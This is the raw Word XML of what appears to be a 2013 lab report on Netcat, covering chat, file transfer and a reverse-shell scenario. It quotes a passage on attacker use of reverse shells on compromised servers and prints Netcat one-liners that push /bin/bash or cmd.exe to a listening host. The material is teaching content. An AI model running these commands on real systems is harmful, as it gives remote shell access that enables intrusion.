          <w:rFonts w:ascii="Calibri,Bold" w:hAnsi="Calibri,Bold" w:cs="Calibri,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Alice's PC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566D85" w:rsidRDefault="00566D85" w:rsidP="00D637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</w:p>
    <w:p w:rsidR="004927C6" w:rsidRDefault="00566D85" w:rsidP="00D637FA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24500" cy="10382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C6" w:rsidRDefault="004927C6" w:rsidP="004927C6"/>
    <w:p w:rsidR="00566D85" w:rsidRDefault="004927C6" w:rsidP="004927C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1365"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>You can see the Bob’s  command prompt  presented Alice’s PC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF0D91" w:rsidRDefault="00EF0D91" w:rsidP="004927C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1365"/>
        </w:tabs>
      </w:pP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Netcat to implement the following scenarios between two networked computers:</w:t>
      </w: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Simple Chat</w:t>
      </w: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File transfer</w:t>
      </w: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Bind / Reverse shell</w:t>
      </w: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Port scanner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF0D91" w:rsidRDefault="00EF0D91" w:rsidP="00EF0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Banner grabber</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF0D91" w:rsidRDefault="00EF0D91" w:rsidP="00EF0D91">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1365"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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alibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Experiment with connections from Windows and Linux machines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005594B" w:rsidRDefault="00B41F05" w:rsidP="00EF0D91">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1365"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario 2: Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006250F0" w:rsidRPr="00C11504" w:rsidRDefault="006250F0" w:rsidP="0062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504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In scenario 2 Alice is requesting help from Bob. The assumption is that Alice does not control the NAT</w:t>
      </w:r>
      <w:r w:rsidR="00C11504" w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>device she is behind. Is there any way for Bob to connect to Alice's computer and solve her problem?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006250F0" w:rsidRPr="00C11504" w:rsidRDefault="006250F0" w:rsidP="00C11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504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Another interesting Netcat feature is the ability to send a command shell to a listening host. In this</w:t>
      </w:r>
      <w:r w:rsidR="00C11504" w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>situation, although Alice cannot bind a port to cmd.exe locally to her computer and expect Bob to</w:t>
      </w:r>
      <w:r w:rsidR="00C11504" w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>connect, she can send her command prompt to Bob's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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  <w:r w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Calibri,Bold" w:hAnsi="Calibri,Bold" w:cs="Calibri,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bob's machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11504" w:rsidRP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2219325" cy="48577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C11504" w:rsidRDefault="00C11504" w:rsidP="00C11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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C11504" w:rsidRDefault="00C11504" w:rsidP="0005594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11504" w:rsidRDefault="00C11504" w:rsidP="0005594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  <w:r w:rsidRPr="00C11504">
        <w:rPr>
          <w:rFonts w:ascii="Calibri,Bold" w:hAnsi="Calibri,Bold" w:cs="Calibri,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Alice's machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11504" w:rsidRDefault="00C11504" w:rsidP="0005594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u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C11504" w:rsidRPr="00C11504" w:rsidRDefault="009A47EB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  <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Frutiger-Bold" w:hAnsi="Frutiger-Bold" w:cs="Frutiger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686300" cy="68580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04" w:rsidRDefault="00C11504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</w:p>
    <w:p w:rsidR="00C11504" w:rsidRDefault="002602E8" w:rsidP="0005594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Bob's machine after the connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Frutiger-Bold" w:hAnsi="Frutiger-Bold" w:cs="Frutiger-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="86677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04" w:rsidRDefault="00C11504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</w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002602E8">
        <w:rPr>
          <w:rFonts w:ascii="Frutiger-Bold" w:hAnsi="Frutiger-Bold" w:cs="Frutiger-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now Bob can use Alice’s shell(i.e. Linux shell) and can give Linux basic shell command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002602E8" w:rsidRP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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Frutiger-Bold" w:hAnsi="Frutiger-Bold" w:cs="Frutiger-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4676775" cy="2009775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2E8" w:rsidRDefault="002602E8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</w:p>
    <w:p w:rsidR="0005594B" w:rsidRDefault="0005594B" w:rsidP="0005594B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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Frutiger-Bold" w:hAnsi="Frutiger-Bold" w:cs="Frutiger-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Creating a Reverse Shell in Netcat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How do you control a server for which you have no local access, and no official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remote access? A Netcat reverse shell can be the key. After a payload has been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dropped onto a compromised server, such as the ability to run commands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through a buffer overflow, there’s not much of a command shell given to the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attacker. All they can do is type in commands, and hope that they run. A live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shell is much easier to work in for continual control over another server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B41F05" w:rsidRPr="00B41F05" w:rsidRDefault="00B41F05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The term “reverse shell” refers to the ability of the server to connect back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to your client and give you shell access, which is the reverse of the normal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routine of you connecting to the server. To perform the procedure, simply run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Netcat in listen mode on your computer, and then run Netcat on the compromised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computer with the option to run a shell, as shown below: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[you@home ∼]# nc –l –p 8080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[root@server ∼]# nc &lt;home’s IP&gt; 8080 –e /bin/bash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When you switch back to your computer, you will have the ability to input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commands and get the results back, just as if you were in a real shell. The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 xml:space="preserve">command prompt will not be displayed, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>so it may become difficult. But, this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process can aid in hiding the connection made by the attacking computer, as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the connection is coming from the server and not the attacker’s computer. The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above example is using a modern Linux- or UNIX-based server. If the server is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 xml:space="preserve">Windows-based, and you have placed Netcat onto it, then replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="00B41F05" w:rsidRPr="00B41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 xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%SystemRoot%\System32\cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, or just </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%COMSPEC%.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For users of the FreeBSD Netcat (referred to as version 1.84), the procedure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 xml:space="preserve">is completely different as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">–e </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>option is not supported. Instead, the home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computer will need two separate sessions opened: one to send commands and</w:t>
      </w:r>
      <w:r w:rsidR="00B41F05" w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>one to receive the results.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[you@home ∼]# nc –l –p 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005594B" w:rsidRPr="00B41F05" w:rsidRDefault="0005594B" w:rsidP="00B4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 xml:space="preserve">[root@server ∼]# nc –l –p 9090 | bash </w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc &lt;home’s IP&gt; 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11504" w:rsidRDefault="0005594B" w:rsidP="00B41F05">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="13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1F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[you@home ∼]# nc &lt;server’s IP&gt; 9090</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11504" w:rsidRDefault="00C11504" w:rsidP="00C11504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0005594B" w:rsidRPr="00C11504" w:rsidRDefault="0005594B" w:rsidP="00C11504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0005594B" w:rsidRPr="00C11504" w:rsidSect="006A6BF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83" w:rsidRDefault="00F85583" w:rsidP="003423E8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00F85583" w:rsidRDefault="00F85583" w:rsidP="0034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Conso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4472"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="003423E8" w:rsidRDefault="00BF7615">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="002602E8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
        </w:fldSimple>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="003423E8" w:rsidRDefault="00342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83" w:rsidRDefault="00F85583" w:rsidP="003423E8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00F85583" w:rsidRDefault="00F85583" w:rsidP="0034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D4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7D2EC4C"/>
    <w:lvl w:ilvl="0" w:tplc="BA4A2B84">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri,Bold" w:hAnsi="Calibri,Bold" w:cs="Calibri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C1CA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C62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4C1"/>
    <w:rsid w:val="000214C1"/>
    <w:rsid w:val="000344FD"/>
    <w:rsid w:val="0005594B"/>
    <w:rsid w:val="00134F47"/>
    <w:rsid w:val="001A20AD"/>
    <w:rsid w:val="001B743C"/>
    <w:rsid w:val="00237399"/>
    <w:rsid w:val="002602E8"/>
    <w:rsid w:val="00292E99"/>
    <w:rsid w:val="003423E8"/>
    <w:rsid w:val="003579F8"/>
    <w:rsid w:val="0038646C"/>
    <w:rsid w:val="003F26C9"/>
    <w:rsid w:val="004166F1"/>
    <w:rsid w:val="00452F37"/>
    <w:rsid w:val="004927C6"/>
    <w:rsid w:val="004E2FE0"/>
    <w:rsid w:val="004F7F0D"/>
    <w:rsid w:val="00566D85"/>
    <w:rsid w:val="005F737D"/>
    <w:rsid w:val="006250F0"/>
    <w:rsid w:val="006A6BF3"/>
    <w:rsid w:val="007205D6"/>
    <w:rsid w:val="0080542E"/>
    <w:rsid w:val="00812863"/>
    <w:rsid w:val="008E174A"/>
    <w:rsid w:val="009A47EB"/>
    <w:rsid w:val="009C6AAD"/>
    <w:rsid w:val="009E5E42"/>
    <w:rsid w:val="00B0644B"/>
    <w:rsid w:val="00B236CB"/>
    <w:rsid w:val="00B41F05"/>
    <w:rsid w:val="00B57B2B"/>
    <w:rsid w:val="00BD297C"/>
    <w:rsid w:val="00BF7615"/>
    <w:rsid w:val="00C11504"/>
    <w:rsid w:val="00CB08F8"/>
    <w:rsid w:val="00CB0BA9"/>
    <w:rsid w:val="00D00EE2"/>
    <w:rsid w:val="00D637FA"/>
    <w:rsid w:val="00EF0D91"/>
    <w:rsid w:val="00F85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3E8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0034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30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-07-26T18:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-27T19:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>